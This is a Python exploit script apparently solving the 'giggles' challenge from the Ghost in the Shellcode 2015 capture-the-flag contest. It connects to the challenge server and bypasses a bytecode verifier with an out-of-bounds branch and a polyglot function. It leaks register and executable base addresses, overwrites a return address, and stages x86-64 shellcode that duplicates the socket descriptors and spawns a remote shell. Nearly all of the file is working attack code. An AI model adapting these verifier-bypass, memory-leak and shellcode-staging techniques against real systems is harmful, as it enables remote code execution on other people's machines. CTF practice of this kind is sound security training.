#!/usr/bin/python
#
# tools.py: https://github.com/niklasb/ctf-tools/blob/master/tools.py

import socket
import struct
import sys
from tools import *

TYPE_ADDFUNC = 0
TYPE_VERIFY = 1
TYPE_RUNFUNC = 2

OP_ADD = 0
OP_BR = 1
OP_BEQ = 2
OP_BGT = 3
OP_MOV = 4
OP_OUT = 5
OP_EXIT = 6

def createOperation(op, opnd1, opnd2, opnd3):
    operation = struct.pack("H", op)
    operation += struct.pack("Q", opnd1)
    operation += struct.pack("Q", opnd2)
    operation += struct.pack("Q", opnd3)
    return operation

def createFunction(num_ops, num_args, bytecode):
    function = struct.pack("H", num_ops)
    function += struct.pack("H", num_args)
    function += struct.pack("B", 0)
    function += bytecode
    return function

def addFunction(sockfd, function):
    packet = struct.pack("B", TYPE_ADDFUNC)
    packet += struct.pack("H", len(function))
    packet += function
    sockfd.send(packet)
    sockfd.recv(2)
    if (struct.unpack("I", sockfd.recv(4))[0] != 0):
        raise Exception()

def verifyFunction(sockfd, idx):
    packet = struct.pack("B", TYPE_VERIFY)
    packet += struct.pack("H", 2)
    packet += struct.pack("H", idx)
    sockfd.send(packet)
    sockfd.recv(2)
    if (struct.unpack("I", sockfd.recv(4))[0] != 0):
        raise Exception()

def runFunction(sockfd, idx, args, wait=1):
    packet = struct.pack("B", TYPE_RUNFUNC)
    packet += struct.pack("H", 4 + 4 * len(args))

    packet += struct.pack("H", idx)
    packet += struct.pack("H", len(args))
    for arg in args:
        packet += struct.pack("I", arg)

    sockfd.send(packet)
    if wait:
        outlen = struct.unpack("H", sockfd.recv(2))[0]
        if (outlen != 0):
            return sockfd.recv(outlen)
        else:
            return ""

def preamble():
    #sockfd = socket.create_connection(('localhost', 1423))
    sockfd = socket.create_connection(('giggles.2015.ghostintheshellcode.com', 1423))

    ins_size = 2 + 3*8
    func_size = 2 + 2 + 1 + 30*ins_size
    jmp_target = func_size

    # add the initial, verified function with out of bounds jump
    operations = ""
    for _ in xrange(30):
        operations += createOperation(OP_BR, 30, 0, 0)
    trampoline_func = createFunction(30, 0, operations)
    addFunction(sockfd, trampoline_func)
    verifyFunction(sockfd, 0)

    # add polyglot function
    s = struct.pack("<HQ", 1, jmp_target) + "A"*5
    num_ops, num_args, verified, opcode, op1 = struct.unpack("<HHBHQ", s)
    assert num_ops == OP_BR
    assert verified == 0

    polyglot_func = createFunction(num_ops, num_args, createOperation(opcode, op1, 0, 0))
    addFunction(sockfd, polyglot_func)

    # padding
    for _ in xrange(ins_size - 2):
        addFunction(sockfd, createFunction(1,0,createOperation(0,0,0,0)))

    return sockfd

def read_relative(w):
    sockfd = preamble()
    operations = createOperation(OP_OUT, w+1, 0, 0)
    operations += createOperation(OP_OUT, w, 0, 0)
    addFunction(sockfd, createFunction(2, 0, operations))
    s = runFunction(sockfd, 0, [])
    return int("".join(s.split()), 16)

register_base = read_relative(24) - 192
print "[*] register base =", hex(register_base)
exe_base = read_relative(26) - 0x1efd
print "[*] exe base =", hex(exe_base)

def calc_abs(addr):
    assert (addr - register_base) % 4 == 0
    return ((addr - register_base) / 4) % (2**64)

jit_ptr = 0x20f5c0
buf = read_relative(calc_abs(exe_base + jit_ptr))
print "[*] jit buffer =", hex(buf)

stage1 = x86_64.assemble("""
    push 4   ; this is the socket fd
    pop rdi
    mov rsi, {buf}
    push 0xff
    pop rdx
    mov rax, 0
    syscall
    """.format(buf=buf+28))
stage1 += "\x90"*(28 - len(stage1))

stage2 = (
    # this code just calls dup2(rdi,0); dup2(rdi,1); dup2(rdi,2)
    x86_64_shellcode.dup2_rdi +
    # and then spawns a shell
    x86_64_shellcode.shell
)
assert len(stage2) <= 0xff

sockfd = preamble()
operations = [
    # overwrite ret addr
    createOperation(OP_MOV, 26, 0, 0),
    createOperation(OP_MOV, 27, 1, 0)
]
# write shellcode
for i in xrange(7):
    operations.append(createOperation(OP_MOV, calc_abs(buf+4*i), 2+i, 0))
operations += [
    createOperation(OP_EXIT, 0, 0, 0),
]

addFunction(sockfd, createFunction(len(operations), 0, "".join(operations)))
args = [buf&0xffffffff, buf>>32] + list(struct.unpack("IIIIIII", stage1))
runFunction(sockfd, 0, args, wait=0)

sockfd.sendall(stage2)
print "[*] Enjoy your shell :)"
socket_interact(sockfd)
